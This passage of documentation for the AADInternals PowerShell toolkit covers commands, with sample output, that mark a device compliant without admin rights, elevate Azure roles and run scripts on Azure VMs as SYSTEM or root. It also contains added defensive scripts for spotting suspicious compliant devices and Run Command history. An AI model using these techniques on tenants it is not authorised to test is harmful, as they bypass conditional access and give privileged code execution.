Gets the user’s device compliance status using AAD Graph API. Does not require admin rights!

Example 1:

# Get access token 
Get-AADIntAccessTokenForAADGraph -SaveToCache

# Get the device compliance
Get-AADIntDeviceCompliance -DeviceId "d03994c9-24f8-41ba-a156-1805998d6dc7"
Output:

displayName           : SixByFour
objectId              : 2eaa21a1-6362-4d3f-afc4-597592217ef0
deviceId              : d03994c9-24f8-41ba-a156-1805998d6dc7
isCompliant           : False
isManaged             : True
deviceOwnership       : Company
deviceManagementAppId : 0000000a-0000-0000-c000-000000000000

Example 2:

# Get the device compliance of owned devices
Get-AADIntDeviceCompliance -My | Format-Table
Output:

displayName   objectId                             deviceId                             isCompliant isManaged deviceOwnership deviceManagementAppId 
-----------   --------                             --------                             ----------- --------- --------------- ---------------------
SixByFour     2eaa21a1-6362-4d3f-afc4-597592217ef0 d03994c9-24f8-41ba-a156-1805998d6dc7       False      True Company         0000000a-0000-0000-c000-000000000000
DESKTOP-X4LCS 8ba68233-4d2b-4331-8b8b-27bc53204d8b c9dcde64-5d0f-4b3c-b711-cb6947837dc2       False      True Company         0000000a-0000-0000-c000-000000000000
SM-1234       c00af9fe-108e-446b-aeee-bf06262973dc 74080692-fb38-4a7b-be25-27d9cbf95705                       Personal

Set-AADIntDeviceCompliant (A)

Since version 0.4.3
Sets the user’s device as compliant using AAD Graph API. Does not require admin rights.
Compliant and managed statuses can be used in conditional access (CA) rules.

Example:

# Get access token 
Get-AADIntAccessTokenForAADGraph -SaveToCache

# Set the device compliant
Set-AADIntDeviceCompliant -DeviceId "d03994c9-24f8-41ba-a156-1805998d6dc7" -Compliant
Output:

displayName           : SixByFour
objectId              : 2eaa21a1-6362-4d3f-afc4-597592217ef0
deviceId              : d03994c9-24f8-41ba-a156-1805998d6dc7
isCompliant           : True
isManaged             : True
deviceOwnership       : Company
deviceManagementAppId : 0000000a-0000-0000-c000-000000000000
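Because Join-AADIntDeviceToAzureAD accepts any device type or OS version and Set-AADIntDeviceCompliant flips the compliance flag without admin rights, a tenant audit should look at compliant devices that do not resemble the fleet. The filter below is an added example (not part of AADInternals); it assumes the AzureAD module’s Get-AzureADDevice output shape, an assumed allow-list of OS types, and runs here against a constructed sample modelled on the “Commodore C64” device registered above.

```powershell
# Added example, not part of AADInternals. Works on device objects as returned
# by Get-AzureADDevice (AzureAD module); the sample at the end is constructed.
function Find-SuspiciousCompliantDevice {
    [CmdletBinding()]
    param(
        [Parameter(Mandatory, ValueFromPipeline)]
        [object[]]$Device,
        # OS types the organisation really enrolls; assumed list, adjust to the
        # values your own Intune enrollments produce.
        [string[]]$AllowedOSType = @('Windows', 'iOS', 'Android', 'MacMDM', 'AndroidForWork'),
        # A compliant device that has not signed in for this long is suspicious.
        [int]$MaxDaysSinceLogon = 90
    )
    process {
        foreach ($d in $Device) {
            if (-not $d.IsCompliant) { continue }
            $reasons = @()
            if ($d.DeviceOSType -notin $AllowedOSType) {
                $reasons += "unexpected OS type '$($d.DeviceOSType)'"
            }
            if (-not $d.IsManaged) {
                $reasons += 'compliant but not managed'
            }
            if (-not $d.ApproximateLastLogonTimeStamp) {
                $reasons += 'no recorded sign-in'
            }
            elseif (((Get-Date) - $d.ApproximateLastLogonTimeStamp).TotalDays -gt $MaxDaysSinceLogon) {
                $reasons += "last sign-in over $MaxDaysSinceLogon days ago"
            }
            if ($reasons.Count -gt 0) {
                [pscustomobject]@{
                    DisplayName = $d.DisplayName
                    DeviceId    = $d.DeviceId
                    OS          = "$($d.DeviceOSType) $($d.DeviceOSVersion)".Trim()
                    Reasons     = ($reasons -join '; ')
                }
            }
        }
    }
}

# Against the tenant (after Connect-AzureAD):
# Get-AzureADDevice -All $true | Find-SuspiciousCompliantDevice | Format-Table -AutoSize

# Constructed sample: the fake device from the join example, marked compliant.
$sample = [pscustomobject]@{
    DisplayName                   = 'My computer'
    DeviceId                      = 'd03994c9-24f8-41ba-a156-1805998d6dc7'
    DeviceOSType                  = 'Commodore'
    DeviceOSVersion               = 'C64'
    IsCompliant                   = $true
    IsManaged                     = $true
    ApproximateLastLogonTimeStamp = $null
}
$sample | Find-SuspiciousCompliantDevice | Format-List
```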

Client functions

Get-AADIntOfficeUpdateBranch

Since version 0.2.4
This function shows the update branch (currently called channel) of Office.

Example:

# Get Office update branch
Get-AADIntOfficeUpdateBranch

Output:

Update branch: Current

Set-AADIntOfficeUpdateBranch

Since version 0.2.4
This function sets the update branch (currently called channel) of Office. Must be run as administrator.

Branch               Channel                Notes
InsiderFast                                 Weekly builds, not generally supported
FirstReleaseCurrent                         Preview of the current
Current              Monthly                Monthly updates
FirstReleaseDeferred Semi-Annual (Targeted) Preview of the deferred (March and September)
Deferred             Semi-Annual            Semi-annual updates (January and July)
DogFood                                     Only for Microsoft employees

Example:

# Set Office update branch
Set-AADIntOfficeUpdateBranch -UpdateBranch InsiderFast

Output:

Update branch: InsiderFast

Support and Recovery Assistant (SARA)

Get-AADIntSARAUserInfo

Since version 0.2.4
This function gets user information using the Microsoft Support and Recovery Assistant (SARA) API. It can help in diagnostics and troubleshooting. The analysis is run on the Microsoft diagnostic server and can take up to 30 seconds.

Example:

# Get user information
$at=Get-AADIntAccessTokenForSARA
Get-AADIntSARAUserInfo -AccessToken $at

Output:

Retrieving information..
Retrieving information..
Retrieving information..

AnalyzerName          : AnalysisRule, Microsoft.Online.CSE.HRC.Analysis.Analyzers.ExchangeCmdlets.GetUserAnalyzer, Microsoft.Online.CSE.HRC.Analysis.Analyzers.ExchangeCmdlets, Version=16.0.3144.0, Culture=
                        neutral, PublicKeyToken=31bf3856ad364e35
AnalyzerDesc          : Attempting to get information about user "user@company.com".
StartTime             : 2019-07-08T12:29:40.4911399Z
Duration              : 00:00:51.1166849
CoreDuration          : 00:00:51.1166849
WaitingDuration       : 00:00:00
TotalChildrenDuration : 00:00:00
TotalWaitingDuration  : 00:00:00
ParentId              : 00000000-0000-0000-0000-000000000000
Value                 : true
ResultTitle           : Extracting information about Office 365 user is completed.
ResultTitleId         : Microsoft.Online.CSE.HRC.Analysis.Analyzers.ExchangeCmdlets.StringsGetUserComplete
UserMessage           : Successfully got the user information for "user@company.com".
UserMessageId         : Microsoft.Online.CSE.HRC.Analysis.Analyzers.ExchangeCmdlets.StringsGetUserSuccessDesc
AdminMessage          : 
SupportMessage        : 
IsMessageShown        : False
GenericInfo           : 
Severity              : 2
OverridesChildren     : False
ProblemId             : 00000000-0000-0000-0000-000000000000
TimeCached            : 0001-01-01T00:00:00
SaraSymptomId         : 00000000-0000-0000-0000-000000000000
SaraWorkflowRunId     : 00000000-0000-0000-0000-000000000000
SaraSymptomRunId      : 00000000-0000-0000-0000-000000000000
SaraSessionId         : 00000000-0000-0000-0000-000000000000
Id                    : d5b4c239-7619-4367-9ccb-e9fe2fe01e23

DisplayName               : Demo USer
FirstName                 : Demo
Guid                      : 67a93665-decb-4058-b42a-271d41c47c61
Id                        : 
Identity                  : EURP185A001.PROD.OUTLOOK.COM/Microsoft Exchange Hosted Organizations/demoo365life4.onmicrosoft.com/AdminO365life
IsDirSynced               : False
IsValid                   : True
LastName                  : User
MicrosoftOnlineServicesID : user@company.com
Name                      : DemoUser
NetID                     : 401320004BA7A415
RecipientType             : UserMailbox
RecipientTypeDetails      : UserMailbox
UserPrincipalName         : user@company.com
WindowsEmailAddress       : user@company.com
WindowsLiveID             : user@company.com
IsHybridTenant            : False
Forest                    : EURP185.PROD.OUTLOOK.COM

Get-AADIntSARATenantInfo

Since version 0.2.4
This function gets tenant information using the Microsoft Support and Recovery Assistant (SARA) API. It can help in diagnostics and troubleshooting. The analysis is run on the Microsoft diagnostic server but should take only a second or two.

Example:

# Get tenant information
$at=Get-AADIntAccessTokenForSARA
Get-AADIntSARATenantInfo -AccessToken $at

Output:

Retrieving information..

AnalyzerName          : AnalysisRule, Microsoft.Online.CSE.HRC.Analysis.Analyzers.TenantInfo.TenantUserInfoAnalyzer, Microsoft.Online.CSE.HRC.Analysis.Analyzers.TenantInfo, Version=16.0.3144.0, Culture=neu
                        tral, PublicKeyToken=31bf3856ad364e35
AnalyzerDesc          : Checking your tenant and account information.
StartTime             : 2019-07-08T12:31:06.1602586Z
Duration              : 00:00:00.6250818
CoreDuration          : 00:00:00.6250818
WaitingDuration       : 00:00:00
TotalChildrenDuration : 00:00:00
TotalWaitingDuration  : 00:00:00
ParentId              : 00000000-0000-0000-0000-000000000000
Value                 : true
ResultTitle           : The licenses of your tenant and account are all good!
ResultTitleId         : Microsoft.Online.CSE.HRC.Analysis.Analyzers.TenantInfo.StringsGetTenantInfoSuccess
UserMessage           : 
UserMessageId         : 
AdminMessage          : 
SupportMessage        : <Setup><ProductId>O365ProPlusRetail</ProductId><ReleaseTrack>False</ReleaseTrack></Setup>
IsMessageShown        : False
GenericInfo           : User Puid is not null or empty.OrgIg_User<TenantUserInfo><IsLicensed>True</IsLicensed><ProvisioningStatus>PendingInput</ProvisioningStatus><PreferredLanguage>en</PreferredLanguage/>
                        <ValidationStatus>Healthy</ValidationStatus><ReleaseTrack>Other</ReleaseTrack><LicenseInformations><LicenseInformation><SKUPartNumber>SPE_E5</SKUPartNumber><ServiceStatus><ServiceTy
                        pe>Exchange</ServiceType><ServiceName>INFORMATION_BARRIERS</ServiceName><ProvisioningStatus>PendingProvisioning</ProvisioningStatus></ServiceStatus><ServiceStatus><ServiceType>Micro
                        softKaizala</ServiceType><ServiceName>KAIZALA_STANDALONE</ServiceName><ProvisioningStatus>PendingProvisioning</ProvisioningStatus></ServiceStatus><ServiceStatus><ServiceType>Bing</S
                        erviceType><ServiceName>MICROSOFT_SEARCH</ServiceName><ProvisioningStatus>PendingProvisioning</ProvisioningStatus></ServiceStatus><ServiceStatus><ServiceType>Exchange</ServiceType><
                        ServiceName>PREMIUM_ENCRYPTION</ServiceName><ProvisioningStatus>Success</ProvisioningStatus></ServiceStatus><ServiceStatus><ServiceType>WhiteboardServices</ServiceType><ServiceName>
                        WHITEBOARD_PLAN3</ServiceName><ProvisioningStatus>Success</ProvisioningStatus></ServiceStatus><ServiceStatus><ServiceType>Exchange</ServiceType><ServiceName>MIP_S_CLP2</ServiceName>
                        <ProvisioningStatus>Success</ProvisioningStatus></ServiceStatus><ServiceStatus><ServiceType>Exchange</ServiceType><ServiceName>MIP_S_CLP1</ServiceName><ProvisioningStatus>Success</P
                        rovisioningStatus></ServiceStatus><ServiceStatus><ServiceType>Exchange</ServiceType><ServiceName>MYANALYTICS_P2</ServiceName><ProvisioningStatus>Success</ProvisioningStatus></Servic
                        eStatus><ServiceStatus><ServiceType>Exchange</ServiceType><ServiceName>PAM_ENTERPRISE</ServiceName><ProvisioningStatus>Success</ProvisioningStatus></ServiceStatus><ServiceStatus><Se
                        rviceType>AzureAdvancedThreatAnalytics</ServiceType><ServiceName>ATA</ServiceName><ProvisioningStatus>Disabled</ProvisioningStatus></ServiceStatus><ServiceStatus><ServiceType>To-Do<
                        /ServiceType><ServiceName>BPOS_S_TODO_3</ServiceName><ProvisioningStatus>Success</ProvisioningStatus></ServiceStatus><ServiceStatus><ServiceType>ProcessSimple</ServiceType><ServiceN
                        ame>FLOW_O365_P3</ServiceName><ProvisioningStatus>Success</ProvisioningStatus></ServiceStatus><ServiceStatus><ServiceType>PowerAppsService</ServiceType><ServiceName>POWERAPPS_O365_P
                        3</ServiceName><ProvisioningStatus>Success</ProvisioningStatus></ServiceStatus><ServiceStatus><ServiceType>OfficeForms</ServiceType><ServiceName>FORMS_PLAN_E5</ServiceName><Provisio
                        ningStatus>Success</ProvisioningStatus></ServiceStatus><ServiceStatus><ServiceType>Adallom</ServiceType><ServiceName>ADALLOM_S_STANDALONE</ServiceName><ProvisioningStatus>Disabled</
                        ProvisioningStatus></ServiceStatus><ServiceStatus><ServiceType>MicrosoftStream</ServiceType><ServiceName>STREAM_O365_E5</ServiceName><ProvisioningStatus>Success</ProvisioningStatus>
                        </ServiceStatus><ServiceStatus><ServiceType>Deskless</ServiceType><ServiceName>Deskless</ServiceName><ProvisioningStatus>Success</ProvisioningStatus></ServiceStatus><ServiceStatus><
                        ServiceType>Exchange</ServiceType><ServiceName>THREAT_INTELLIGENCE</ServiceName><ProvisioningStatus>Success</ProvisioningStatus></ServiceStatus><ServiceStatus><ServiceType>Teamspace
                        API</ServiceType><ServiceName>TEAMS1</ServiceName><ProvisioningStatus>Success</ProvisioningStatus></ServiceStatus><ServiceStatus><ServiceType>WindowsDefenderATP</ServiceType><Servic
                        eName>WINDEFATP</ServiceName><ProvisioningStatus>Success</ProvisioningStatus></ServiceStatus><ServiceStatus><ServiceType>Windows</ServiceType><ServiceName>WIN10_PRO_ENT_SUB</Service
                        Name><ProvisioningStatus>Success</ProvisioningStatus></ServiceStatus><ServiceStatus><ServiceType>RMSOnline</ServiceType><ServiceName>RMS_S_PREMIUM2</ServiceName><ProvisioningStatus>
                        Disabled</ProvisioningStatus></ServiceStatus><ServiceStatus><ServiceType>AADPremiumService</ServiceType><ServiceName>AAD_PREMIUM_P2</ServiceName><ProvisioningStatus>Disabled</Provis
                        ioningStatus></ServiceStatus><ServiceStatus><ServiceType>RMSOnline</ServiceType><ServiceName>RMS_S_PREMIUM</ServiceName><ProvisioningStatus>Disabled</ProvisioningStatus></ServiceSta
                        tus><ServiceStatus><ServiceType>RMSOnline</ServiceType><ServiceName>RMS_S_ENTERPRISE</ServiceName><ProvisioningStatus>Disabled</ProvisioningStatus></ServiceStatus><ServiceStatus><Se
                        rviceType>MultiFactorService</ServiceType><ServiceName>MFA_PREMIUM</ServiceName><ProvisioningStatus>Disabled</ProvisioningStatus></ServiceStatus><ServiceStatus><ServiceType>SCO</Ser
                        viceType><ServiceName>INTUNE_A</ServiceName><ProvisioningStatus>Disabled</ProvisioningStatus></ServiceStatus><ServiceStatus><ServiceType>AADPremiumService</ServiceType><ServiceName>
                        AAD_PREMIUM</ServiceName><ProvisioningStatus>Disabled</ProvisioningStatus></ServiceStatus><ServiceStatus><ServiceType>YammerEnterprise</ServiceType><ServiceName>YAMMER_ENTERPRISE</S
                        erviceName><ProvisioningStatus>Success</ProvisioningStatus></ServiceStatus><ServiceStatus><ServiceType>Sway</ServiceType><ServiceName>SWAY</ServiceName><ProvisioningStatus>Success</
                        ProvisioningStatus></ServiceStatus><ServiceStatus><ServiceType>SharePoint</ServiceType><ServiceName>SHAREPOINTWAC</ServiceName><ProvisioningStatus>Success</ProvisioningStatus></Serv
                        iceStatus><ServiceStatus><ServiceType>SharePoint</ServiceType><ServiceName>SHAREPOINTENTERPRISE</ServiceName><ProvisioningStatus>Success</ProvisioningStatus></ServiceStatus><Service
                        Status><ServiceType>ProjectWorkManagement</ServiceType><ServiceName>PROJECTWORKMANAGEMENT</ServiceName><ProvisioningStatus>Success</ProvisioningStatus></ServiceStatus><ServiceStatus
                        ><ServiceType>MicrosoftOffice</ServiceType><ServiceName>OFFICESUBSCRIPTION</ServiceName><ProvisioningStatus>Success</ProvisioningStatus></ServiceStatus><ServiceStatus><ServiceType>M
                        icrosoftCommunicationsOnline</ServiceType><ServiceName>MCOSTANDARD</ServiceName><ProvisioningStatus>Success</ProvisioningStatus></ServiceStatus><ServiceStatus><ServiceType>Microsoft
                        CommunicationsOnline</ServiceType><ServiceName>MCOMEETADV</ServiceName><ProvisioningStatus>Success</ProvisioningStatus></ServiceStatus><ServiceStatus><ServiceType>MicrosoftCommunica
                        tionsOnline</ServiceType><ServiceName>MCOEV</ServiceName><ProvisioningStatus>Success</ProvisioningStatus></ServiceStatus><ServiceStatus><ServiceType>Exchange</ServiceType><ServiceNa
                        me>LOCKBOX_ENTERPRISE</ServiceName><ProvisioningStatus>Success</ProvisioningStatus></ServiceStatus><ServiceStatus><ServiceType>SCO</ServiceType><ServiceName>INTUNE_O365</ServiceName
                        ><ProvisioningStatus>PendingActivation</ProvisioningStatus></ServiceStatus><ServiceStatus><ServiceType>Exchange</ServiceType><ServiceName>EXCHANGE_S_ENTERPRISE</ServiceName><Provisi
                        oningStatus>Success</ProvisioningStatus></ServiceStatus><ServiceStatus><ServiceType>Exchange</ServiceType><ServiceName>EXCHANGE_ANALYTICS</ServiceName><ProvisioningStatus>Success</P
                        rovisioningStatus></ServiceStatus><ServiceStatus><ServiceType>Exchange</ServiceType><ServiceName>EQUIVIO_ANALYTICS</ServiceName><ProvisioningStatus>Success</ProvisioningStatus></Ser
                        viceStatus><ServiceStatus><ServiceType>PowerBI</ServiceType><ServiceName>BI_AZURE_P2</ServiceName><ProvisioningStatus>Success</ProvisioningStatus></ServiceStatus><ServiceStatus><Ser
                        viceType>Exchange</ServiceType><ServiceName>ATP_ENTERPRISE</ServiceName><ProvisioningStatus>PendingProvisioning</ProvisioningStatus></ServiceStatus><ServiceStatus><ServiceType>Adall
                        om</ServiceType><ServiceName>ADALLOM_S_O365</ServiceName><ProvisioningStatus>PendingInput</ProvisioningStatus></ServiceStatus></LicenseInformation><LicenseInformation><SKUPartNumber
                        >EMSPREMIUM</SKUPartNumber><ServiceStatus><ServiceType>Exchange</ServiceType><ServiceName>EXCHANGE_S_FOUNDATION</ServiceName><ProvisioningStatus>PendingProvisioning</ProvisioningSta
                        tus></ServiceStatus><ServiceStatus><ServiceType>AzureAdvancedThreatAnalytics</ServiceType><ServiceName>ATA</ServiceName><ProvisioningStatus>Success</ProvisioningStatus></ServiceStat
                        us><ServiceStatus><ServiceType>Adallom</ServiceType><ServiceName>ADALLOM_S_STANDALONE</ServiceName><ProvisioningStatus>PendingInput</ProvisioningStatus></ServiceStatus><ServiceStatu
                        s><ServiceType>RMSOnline</ServiceType><ServiceName>RMS_S_PREMIUM2</ServiceName><ProvisioningStatus>Success</ProvisioningStatus></ServiceStatus><ServiceStatus><ServiceType>RMSOnline<
                        /ServiceType><ServiceName>RMS_S_PREMIUM</ServiceName><ProvisioningStatus>Success</ProvisioningStatus></ServiceStatus><ServiceStatus><ServiceType>RMSOnline</ServiceType><ServiceName>
                        RMS_S_ENTERPRISE</ServiceName><ProvisioningStatus>Success</ProvisioningStatus></ServiceStatus><ServiceStatus><ServiceType>SCO</ServiceType><ServiceName>INTUNE_A</ServiceName><Provis
                        ioningStatus>PendingInput</ProvisioningStatus></ServiceStatus><ServiceStatus><ServiceType>AADPremiumService</ServiceType><ServiceName>AAD_PREMIUM_P2</ServiceName><ProvisioningStatus
                        >Success</ProvisioningStatus></ServiceStatus><ServiceStatus><ServiceType>MultiFactorService</ServiceType><ServiceName>MFA_PREMIUM</ServiceName><ProvisioningStatus>Success</Provision
                        ingStatus></ServiceStatus><ServiceStatus><ServiceType>AADPremiumService</ServiceType><ServiceName>AAD_PREMIUM</ServiceName><ProvisioningStatus>Success</ProvisioningStatus></ServiceS
                        tatus></LicenseInformation></LicenseInformations></TenantUserInfo>
Severity              : 2
OverridesChildren     : False
ProblemId             : 00000000-0000-0000-0000-000000000000
TimeCached            : 0001-01-01T00:00:00
SaraSymptomId         : 00000000-0000-0000-0000-000000000000
SaraWorkflowRunId     : 00000000-0000-0000-0000-000000000000
SaraSymptomRunId      : 00000000-0000-0000-0000-000000000000
SaraSessionId         : 00000000-0000-0000-0000-000000000000
Id                    : 81157ffa-d946-4bf8-8d6e-a391b96e4bf6

Azure functions

Grant-AADIntAzureUserAccessAdminRole (AC)

Since version 0.3.3
Elevates the currently authenticated Global Admin to Azure User Access Administrator. This allows the admin, for instance, to manage all role assignments in all subscriptions of the tenant.

Example:

# Get the Access Token
$at=Get-AADIntAccessTokenForAzureCoreManagement

# Grant Azure User Access Administrator role 
Grant-AADIntAzureUserAccessAdminRole -AccessToken $at

Get-AADIntAzureSubscriptions (AC)

Since version 0.3.3
Lists the tenant's Azure subscriptions.

Example:

# Get the Access Token
$at=Get-AADIntAccessTokenForAzureCoreManagement

# Get all subscriptions of the current tenant
Get-AADIntAzureSubscriptions -AccessToken $at

Output:

subscriptionId                       displayName   state  
--------------                       -----------   -----  
867ae413-0ad0-49bf-b4e4-6eb2db1c12a0 MyAzure001    Enabled
99fccfb9-ed41-4179-aaf5-93cae2151a77 Pay-as-you-go Enabled

Set-AADIntAzureRoleAssignment (AC)

Since version 0.3.3
Assigns a given role to the given user. Defaults to the current user.

Example:

# Get the Access Token
$at=Get-AADIntAccessTokenForAzureCoreManagement

# Grant Virtual Machine Contributor role to the current user
Set-AADIntAzureRoleAssignment -AccessToken $at -SubscriptionId 867ae413-0ad0-49bf-b4e4-6eb2db1c12a0 -RoleName "Virtual Machine Contributor"

Output:

roleDefinitionId : /subscriptions/867ae413-0ad0-49bf-b4e4-6eb2db1c12a0/providers/Microsoft.Authorization/roleDefinitions/9980e02c-c2be-4d73-94e8-173b1dc7cf3c
principalId      : 90f9ca62-2238-455b-bb15-de695d689c12
principalType    : User
scope            : /subscriptions/867ae413-0ad0-49bf-b4e4-6eb2db1c12a0
createdOn        : 2020-06-03T11:29:58.1683714Z
updatedOn        : 2020-06-03T11:29:58.1683714Z
createdBy        : 
updatedBy        : 90f9ca62-2238-455b-bb15-de695d689c12

Get-AADIntAzureClassicAdministrators (AC)

Since version 0.3.3
Returns the classic administrators of the given Azure subscription.

Example:

# Get the Access Token
$at=Get-AADIntAccessTokenForAzureCoreManagement
Get-AADIntAzureClassicAdministrators -AccessToken $at

Output:

emailAddress                  role                                     
------------                  ----                                     
admin@company.onmicrosoft.com ServiceAdministrator;AccountAdministrator
co-admin@comapny.com          CoAdministrator

Get-AADIntAzureResourceGroups (AC)

Since version 0.3.3
Lists the resource groups of the given Azure subscription.

Example:

# Get the Access Token
$at=Get-AADIntAccessTokenForAzureCoreManagement

# List the Resource Groups
Get-AADIntAzureResourceGroups -AccessToken $at -SubscriptionId 867ae413-0ad0-49bf-b4e4-6eb2db1c12a0

Output:

name       location tags
----       -------- ----
Production westus   Production
Test       eastus   Test

Get-AADIntAzureVMs (AC)

Since version 0.3.3
Lists the virtual machines of the given Azure subscription and shows the relevant information about each.

Example:

# Get the Access Token
$at=Get-AADIntAccessTokenForAzureCoreManagement

# List the VMs
Get-AADIntAzureVMs -AccessToken $at -SubscriptionId 867ae413-0ad0-49bf-b4e4-6eb2db1c12a0

Output:

resourceGroup name     location   id                                   computerName adminUserName vmSize          OS     
------------- ----     --------   --                                   ------------ ------------- ------          --     
PRODUCTION    Client   westus     c210d38b-3346-41d3-a23d-27988315825b Client       AdminUSer     Standard_A2_v2  Windows
PRODUCTION    DC       westus     9b8f8753-196f-4f24-847a-e5bcb751936d DC           AdminUSer     Standard_DS1_v2 Windows
PRODUCTION    Exchange westus     a12ffb24-a69e-4ce9-aff3-275f49bba315 Exchange     AdminUSer     Standard_DS2_v2 Windows
PRODUCTION    Server1  westus     c7d98db7-ccb5-491f-aaeb-e71f0df478b6 Server1      AdminUSer     Standard_DS1_v2 Windows
TEST          Server2  eastus     ae34dfcc-ad89-4e53-b0b4-20d453bdfcef Server2      AdminUSer     Standard_DS1_v2 Windows
TEST          Server3  eastus     f8f6a7c5-9927-47f9-a790-84c866f5719c Server3      AzureUser     Standard_B1ms   Linux

Invoke-AADIntAzureVMScript (AC)

Since version 0.3.3
Runs a given script on the given Azure VM as SYSTEM (Windows) or root (Linux).

Note! Although the script supports UTF-8, the response only shows ASCII characters, so any non-ASCII UTF-8 character is shown incorrectly (a bug at Microsoft's end).

Multi-line scripts are supported. Use `n as a line separator.

Example1:

# Get the Access Token
$at=Get-AADIntAccessTokenForAzureCoreManagement

# Invoke "whoami" on Server2
Invoke-AADIntAzureVMScript -AccessToken $at -SubscriptionId 867ae413-0ad0-49bf-b4e4-6eb2db1c12a0 -ResourceGroup PRODUCTION -Server Server2 -Script "whoami"

Output1:

[stdout]
nt authority\system

[stderr]

Example2:

# Get the Access Token
$at=Get-AADIntAccessTokenForAzureCoreManagement

# Invoke "whoami" on Server3
Invoke-AADIntAzureVMScript -AccessToken $at -SubscriptionId 867ae413-0ad0-49bf-b4e4-6eb2db1c12a0 -ResourceGroup TEST -Server Server3 -Script "whoami" -VMType Linux

Output2:

Enable succeeded: 
[stdout]
root

[stderr]

Example3:

# Get the Access Token
$at=Get-AADIntAccessTokenForAzureCoreManagement

# Invoke multi-line script on Server2
Invoke-AADIntAzureVMScript -AccessToken $at -SubscriptionId 867ae413-0ad0-49bf-b4e4-6eb2db1c12a0 -ResourceGroup PRODUCTION -Server Server2 -Script "whoami`nGet-Process 123123123"

Output3:

[stdout]
nt authority\system

[stderr]
Get-Process : Cannot find a process with the name "123123123". Verify the process name and call the cmdlet again.
At C:\Packages\Plugins\Microsoft.CPlat.Core.RunCommandWindows\1.1.5\Downloads\script42.ps1:2 char:1
+ Get-Process 123123123
+ ~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : ObjectNotFound: (123123123:String) [Get-Process], ProcessCommandException
    + FullyQualifiedErrorId : NoProcessFoundForGivenName,Microsoft.PowerShell.Commands.GetProcessCommand

Example4:

# List running processes of Server2
Invoke-AADIntAzureVMScript -AccessToken $at -SubscriptionId 867ae413-0ad0-49bf-b4e4-6eb2db1c12a0 -ResourceGroup PRODUCTION -Server Server2 -Script "Get-Process"

Output4:
[stdout]
    727      36    14132      27092       5.94    396   0 svchost                                                      
    936      29    69796      76820       7.91    400   0 svchost                                                      
    664      22    15664      27432      39.39    464   0 svchost                                                      
    839      23     6856      24352       0.91    792   0 svchost                                                      
    785      17     4792      10968       4.75    892   0 svchost                                                      
    282      13     3020       9324       7.41   1052   0 svchost                                                      
   1889      96    38548      72480      24.86   1216   0 svchost                                                      
    642      35     8928      28452       0.50   1236   0 svchost                                                      
    519      24    19480      37620       4.08   1376   0 svchost                                                      
    411      17    15440      18076      29.81   1392   0 svchost                                                      
    833      41    10676      25512       2.02   1424   0 svchost                                                      
    317      11     2000       8840       0.08   1432   0 svchost                                                      
    380      31     7324      16320       0.39   1584   0 svchost                                                      
    211      12     1876       7524       0.22   1808   0 svchost                                                      
    199       9     1596       6916       0.00   1968   0 svchost                                                      
    200      10     2308       8344       0.06   2188   0 svchost                                                      
    146       8     1472       7144       0.06   3000   0 svchost                                                      
    468      21     6516      31128       0.33   3140   2 svchost                                                      
    173       9     4332      12968       0.72   3208   0 svchost                                                      
   2061       0      192        156      11.45      4   0 System                                                       
    340      17     3964      17324       0.13   3416   2 TabTip                                                       
    413      24    13016      34008       0.25   4488   2 TabTip                                                       
    103       7     1264       4756       0.00   3264   2 TabTip32                                                     
    216      22     4864      14260       0.08   1272   2 taskhostw                                                    
    446      24    17080      22096       0.39   2796   0 taskhostw                                                    
    150       9     1664       8984       0.03   1196   0 VSSVC                                                        
    946      45    62896      78976      13.22   2068   0 WaAppAgent                                                   
    119       6     1504       5800       0.02   4152   0 WaSecAgentProv                                               
    646      41    45220      68180      85.78   2088   0 WindowsAzureGuestAgent                                       
    131       9     2252       8344       0.03   3868   0 WindowsAzureNetAgent                                         
    174      11     1548       6916       0.11    552   0 wininit                                                      
    234      11     2588      11160       0.09    612   1 winlogon                                                     
    266      12     2456      10120       0.08   3428   2 winlogon                                                     
    178      10     2776       8368       0.02   4052   0 WmiPrvSE
[stderr]
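The stderr in Output3 shows where the Run Command extension stages the scripts it executes on the VM, which gives defenders a local trail of what has been run this way. The following is an added example, not part of AADInternals, that lists those staged scripts; it is run locally on the Windows VM and assumes the plugin path shown above (adjust it if the VM uses a different layout).

```powershell
# Added example (not part of AADInternals): list the scripts that have been executed on
# this Windows VM through the Run Command extension. Each script is staged under
# <plugin root>\<version>\Downloads\, the path seen in the stderr output above.
function Get-RunCommandScriptHistory {
    param(
        # Plugin root as seen in the error output above (assumption: same layout on this VM)
        [string]$PluginRoot = 'C:\Packages\Plugins\Microsoft.CPlat.Core.RunCommandWindows'
    )
    if (-not (Test-Path -Path $PluginRoot)) {
        Write-Verbose "Run Command plugin folder not found: $PluginRoot"
        return
    }
    # One sub-folder per installed plugin version (e.g. 1.1.5)
    Get-ChildItem -Path $PluginRoot -Directory | ForEach-Object {
        $downloads = Join-Path -Path $_.FullName -ChildPath 'Downloads'
        if (Test-Path -Path $downloads) {
            Get-ChildItem -Path $downloads -Filter '*.ps1' -File | ForEach-Object {
                [pscustomobject]@{
                    PluginVersion = $_.Directory.Parent.Name
                    Script        = $_.Name
                    LastWriteTime = $_.LastWriteTime
                    SizeBytes     = $_.Length
                    # Hash lets you match the script against what was approved or ticketed
                    Sha256        = (Get-FileHash -Path $_.FullName -Algorithm SHA256).Hash
                    # First line is usually enough to recognise the script's purpose
                    FirstLine     = (Get-Content -Path $_.FullName -TotalCount 1)
                }
            }
        }
    } | Sort-Object -Property LastWriteTime -Descending
}

# Newest executions first; pipe to Export-Csv to keep a record off the box
Get-RunCommandScriptHistory | Format-Table -AutoSize
```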

Get-AADIntAzureVMRdpSettings (AC)

Since version 0.3.3
Shows the RDP settings of the given VM.

Example:

# Get the Access Token
$at=Get-AADIntAccessTokenForAzureCoreManagement

# Dump the RDP settings
Get-AADIntAzureVMRdpSettings -AccessToken $at -SubscriptionId 867ae413-0ad0-49bf-b4e4-6eb2db1c12a0 -ResourceGroup PRODUCTION -Server Server2

Output:

Not domain joined
HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server\Winstations\RDP-Tcp\PortNumber: 3389
HKLM:\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services\fDenyTSConnections: 
HKLM:\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services\KeepAliveEnable: 1
HKLM:\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services\KeepAliveInterval: 1
HKLM:\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services\KeepAliveTimeout: 1
HKLM:\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services\fDisableAutoReconnect: 0
